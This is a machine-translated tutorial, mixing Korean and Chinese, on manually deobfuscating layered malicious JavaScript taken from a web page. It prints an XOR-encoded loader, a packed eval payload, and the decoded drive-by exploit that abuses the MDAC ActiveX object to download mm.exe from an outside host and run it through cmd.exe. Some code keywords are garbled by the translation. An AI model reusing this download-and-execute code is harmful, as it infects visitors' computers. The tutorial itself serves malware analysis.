javascript [원본]_javascript 기술의 다양한 암호화를 해독하기 위해 Jser의 필수 역 사고 방법-JS 튜토리얼-php.cn

원본,재인쇄시 출처를 밝혀주세요스크립트하우스
방금 JavaScript의 다양한 암호화를 해독하는 역 사고 방법을 발견했습니다. 좋은 방법이 있으면 게시해 주세요
최근에 5계층 정도 암호화된 코드를 발견했는데, 자바스크립트 복호화 프로그램을 사용하지 않고 마지막 단계까지 해독해보겠습니다

사용된 소프트웨어 목록
1. 직접 열람하면 Xunlei(다운로드 웹페이지)가 실행되며, 소스코드를 볼 수 없습니다
2. 또는 Firefox 소프트웨어를 사용하여 웹사이트를 직접 탐색할 수 있습니다. Firefox의 특수한 특성으로 인해 이 브라우저도 권장됩니다
1. 타겟 URL http://www.e9ad.cn/pcdd/80-806.htm
우리는 Thunder를 사용하여 이 페이지를 다운로드하거나 Firefox 브라우저를 사용하여 다음 코드를 탐색하고 얻습니다.

코드 복사 코드는 다음과 같습니다.

 
<스크립트 언어=javascript>var DFQC=function(a){return String.fromCharCode 

(a^22)};document.write(DFQC(42) DFQC(126) DFQC(98) DFQC(123) DFQC(122) DFQC(40) DFQC(27) 

 DFQC(28) DFQC(54) DFQC(42) DFQC(126) DFQC(115) DFQC(119) DFQC(114) DFQC(40) DFQC(27) DFQC 

(28) DFQC(42) DFQC(101) DFQC(117) DFQC(100) DFQC(127) DFQC(102) DFQC(98) DFQC(40) DFQC(27) 

 DFQC(28) DFQC(54) DFQC(112) DFQC(99) DFQC(120) DFQC(117) DFQC(98) DFQC(127) DFQC(121) DFQC 

(120) DFQC(54) DFQC(117) DFQC(122) DFQC(115) DFQC(119) DFQC(100) DFQC(62) DFQC(63) DFQC 

(109) DFQC(27) DFQC(28) DFQC(54) DFQC(69) DFQC(121) DFQC(99) DFQC(100) DFQC(117) DFQC(115) 

 DFQC(43) DFQC(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) 

 DFQC(56) DFQC(116) DFQC(121) DFQC(114) DFQC(111) DFQC(56) DFQC(112) DFQC(127) DFQC(100) 

 DFQC(101) DFQC(98) DFQC(85) DFQC(126) DFQC(127) DFQC(122) DFQC(114) DFQC(56) DFQC(114) 

 DFQC(119) DFQC(98) DFQC(119) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121) DFQC 

(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(121) DFQC(102) DFQC 

(115) DFQC(120) DFQC(62) DFQC(63) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121) 

 DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(117) DFQC(122) 

 DFQC(121) DFQC(101) DFQC(115) DFQC(62) DFQC(63) DFQC(45) DFQC(27) DFQC(28) DFQC(54) DFQC 

(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115) DFQC(120) DFQC(98) DFQC(56) DFQC(98) 

 DFQC(127) DFQC(98) DFQC(122) DFQC(115) DFQC(43) DFQC(52) DFQC(113) DFQC(113) DFQC(52) DFQC 

(45) DFQC(27) DFQC(28) DFQC(54) DFQC(114) DFQC(121) DFQC(117) DFQC(99) DFQC(123) DFQC(115) 

 DFQC(120) DFQC(98) DFQC(56) DFQC(116) DFQC(121) DFQC(114) DFQC(111) DFQC(56) DFQC(127) 

 DFQC(120) DFQC(120) DFQC(115) DFQC(100) DFQC(94) DFQC(66) DFQC(91) DFQC(90) DFQC(43) DFQC 

(69) DFQC(121) DFQC(99) DFQC(100) DFQC(117) DFQC(115) DFQC(45) DFQC(27) DFQC(28) DFQC(54) 

 DFQC(107) DFQC(42) DFQC(57) DFQC(101) DFQC(117) DFQC(100) DFQC(127) DFQC(102) DFQC(98) 

 DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(98) DFQC(127) DFQC(98) DFQC(122) DFQC 

(115) DFQC(40) DFQC(119) DFQC(114) DFQC(42) DFQC(57) DFQC(98) DFQC(127) DFQC(98) DFQC(122) 

 DFQC(115) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(126) DFQC(115) DFQC 

(119) DFQC(114) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(116) DFQC(121) DFQC(114) 

 DFQC(111) DFQC(54) DFQC(121) DFQC(120) DFQC(122) DFQC(121) DFQC(119) DFQC(114) DFQC(43) 

 DFQC(117) DFQC(122) DFQC(115) DFQC(119) DFQC(100) DFQC(62) DFQC(63) DFQC(54) DFQC(98) DFQC 

(121) DFQC(102) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(43) DFQC 

(52) DFQC(38) DFQC(52) DFQC(54) DFQC(122) DFQC(115) DFQC(112) DFQC(98) DFQC(123) DFQC(119) 

 DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC 

(100) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC 

(127) DFQC(120) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC(116) DFQC(121) DFQC(98) 

 DFQC(98) DFQC(121) DFQC(123) DFQC(123) DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120) 

 DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(55) 

 DFQC(59) DFQC(59) DFQC(27) DFQC(28) DFQC(42) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC 

(123) DFQC(115) DFQC(54) DFQC(120) DFQC(119) DFQC(123) DFQC(115) DFQC(43) DFQC(52) DFQC(95) 

 DFQC(39) DFQC(52) DFQC(54) DFQC(101) DFQC(100) DFQC(117) DFQC(43) DFQC(52) DFQC(46) DFQC 

(38) DFQC(46) DFQC(38) DFQC(56) DFQC(126) DFQC(98) DFQC(123) DFQC(52) DFQC(54) DFQC(123) 

 DFQC(119) DFQC(100) DFQC(113) DFQC(127) DFQC(120) DFQC(97) DFQC(127) DFQC(114) DFQC(98) 

 DFQC(126) DFQC(43) DFQC(52) DFQC(39) DFQC(52) DFQC(54) DFQC(123) DFQC(119) DFQC(100) DFQC 

(113) DFQC(127) DFQC(120) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC 

(43) DFQC(52) DFQC(39) DFQC(52) DFQC(54) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126) 

 DFQC(98) DFQC(43) DFQC(52) DFQC(46) DFQC(38) DFQC(52) DFQC(54) DFQC(97) DFQC(127) DFQC 

(114) DFQC(98) DFQC(126) DFQC(43) DFQC(52) DFQC(46) DFQC(38) DFQC(52) DFQC(54) DFQC(101) 

 DFQC(117) DFQC(100) DFQC(121) DFQC(122) DFQC(122) DFQC(127) DFQC(120) DFQC(113) DFQC(43) 

 DFQC(52) DFQC(120) DFQC(121) DFQC(52) DFQC(54) DFQC(116) DFQC(121) DFQC(100) DFQC(114) 

 DFQC(115) DFQC(100) DFQC(43) DFQC(52) DFQC(38) DFQC(52) DFQC(54) DFQC(112) DFQC(100) DFQC 

(119) DFQC(123) DFQC(115) DFQC(116) DFQC(121) DFQC(100) DFQC(114) DFQC(115) DFQC(100) DFQC 

(43) DFQC(52) DFQC(38) DFQC(52) DFQC(40) DFQC(42) DFQC(57) DFQC(127) DFQC(112) DFQC(100) 

 DFQC(119) DFQC(123) DFQC(115) DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(59) DFQC(59) DFQC 
(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(116) DFQC(121) DFQC(114) DFQC(111) 

 DFQC(40) DFQC(27) DFQC(28) DFQC(54) DFQC(42) DFQC(57) DFQC(126) DFQC(98) DFQC(123) DFQC 

(122) DFQC(40) DFQC(54) DFQC(27) DFQC(28) DFQC(42) DFQC(69) DFQC(85) DFQC(68) DFQC(95) DFQC 

(70) DFQC(66) DFQC(40) DFQC(54) DFQC(27) DFQC(28) DFQC(42) DFQC(55) DFQC(59) DFQC(59) DFQC 

(54) DFQC(27) DFQC(28) DFQC(97) DFQC(127) DFQC(120) DFQC(114) DFQC(121) DFQC(97) DFQC(56) 

 DFQC(114) DFQC(115) DFQC(112) DFQC(119) DFQC(99) DFQC(122) DFQC(98) DFQC(69) DFQC(98) DFQC 

(119) DFQC(98) DFQC(99) DFQC(101) DFQC(43) DFQC(52) DFQC(54) DFQC(54) DFQC(52) DFQC(45) 

 DFQC(54) DFQC(27) DFQC(28) DFQC(57) DFQC(57) DFQC(59) DFQC(59) DFQC(40) DFQC(54) DFQC(27) 

 DFQC(28) DFQC(42) DFQC(57) DFQC(69) DFQC(85) DFQC(68) DFQC(95) DFQC(70) DFQC(66) DFQC(40) 

 DFQC(27) DFQC(28) DFQC(42) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC(123) DFQC(115) 

 DFQC(54) DFQC(101) DFQC(100) DFQC(117) DFQC(43) DFQC(126) DFQC(98) DFQC(98) DFQC(102) DFQC 

(44) DFQC(57) DFQC(57) DFQC(102) DFQC(121) DFQC(102) DFQC(56) DFQC(97) DFQC(108) DFQC(110) 

 DFQC(103) DFQC(111) DFQC(56) DFQC(117) DFQC(121) DFQC(123) DFQC(57) DFQC(33) DFQC(33) DFQC 

(33) DFQC(57) DFQC(127) DFQC(120) DFQC(114) DFQC(115) DFQC(110) DFQC(56) DFQC(126) DFQC(98) 

 DFQC(123) DFQC(54) DFQC(97) DFQC(127) DFQC(114) DFQC(98) DFQC(126) DFQC(43) DFQC(38) DFQC 

(54) DFQC(126) DFQC(115) DFQC(127) DFQC(113) DFQC(126) DFQC(98) DFQC(43) DFQC(38) DFQC(40) 

 DFQC(42) DFQC(57) DFQC(127) DFQC(112) DFQC(100) DFQC(119) DFQC(123) DFQC(115) DFQC(40) 

 DFQC(27) DFQC(28) DFQC(27) DFQC(28) '');

对于这个的解密呢，分析下
大家看下document.write(DFQC(42) DFQC(126).....
DFQC(42), 적DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代码也想好了，这个方法基本上可以破解好多的类似代码，大家可以看下这个代码

[Ctrl A 전체选注:如需引入외부Js需刷新才能执行

]

得到的解密的代码就是

复代码

代码如下:

 
<머리> 

<스크립트> 

함수 클리어(){ 

출처=document.body.firstChild.data; 

document.open(); 

document.close(); 

document.title="gg"; 

document.body.innerHTML=소스; 

} 

광고 

<스크립트>

두 번째, 아래쪽 상단의 http://www.e9ad.cn/pcdd/8080.htm과http://pop.*****.com/777/index.htm
내 하단에는 iframe이 있습니다.
用下载工具下载http://pop.*****.com/777/index.htm这个页面的代码可以发现如下

复代码

代码如下:

看这个大家应该会想起，好多网站卖流量类似的代码（就是卖流量的）
三、继续分析下 http://cc.*****.com/wm/index.htm
用下载工具下载这个页面，可以得到

复制代码代码如下:

好的继续下载http://cc.*****.com/wm/1.js这个js文件我得到了这个代码

复制代码代码如下:

 
eval(function(p,a,c,k,e,d){e=function(c){return(c35? 

String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k 

[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c]) 

p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5 

\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7 

("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3 

F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7 

("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i) 

{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb 

er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu 

te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s 

end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil 

e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

大家看到上面的代码可能会发现无法解密了，我搜了下，发现了，竟然有解密代码了，此处可以分析，不
过我这篇文章的目地，是不用解密程序的，所有我用下面的方法，

var str=(function(p,a,c,k,e,d){e=function(c){return(c<a&#63;'':e(parseInt(c/a)))+((c=c%a)>35&#63;

String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k

[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])

p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5

\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7

("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3

F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7

("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)

{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb

er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu

te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s

end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil

e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))

document.write(str);

</script>

[Ctrl+A 全选注:如需引入外部Js需刷新才能执行]

上面的方法，我要是考虑下几秒想到的方法，以前没想起，现在大家以后就可以更方面的使用了
先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码

复制代码代码如下:

 
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try 

{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute 

("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject 

("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject 

("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var 

F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder 

(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile 

(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath 

(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

然后我们可以发现这个http://cc.*****.com/wm/mm.exe，先下下载下来，记住下载后一般看大小，病毒
文件都很小，先将mm.exe改名位mm.exe.txt，打开看到了如下代码，唉，

复制代码代码如下:

<본문>

<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>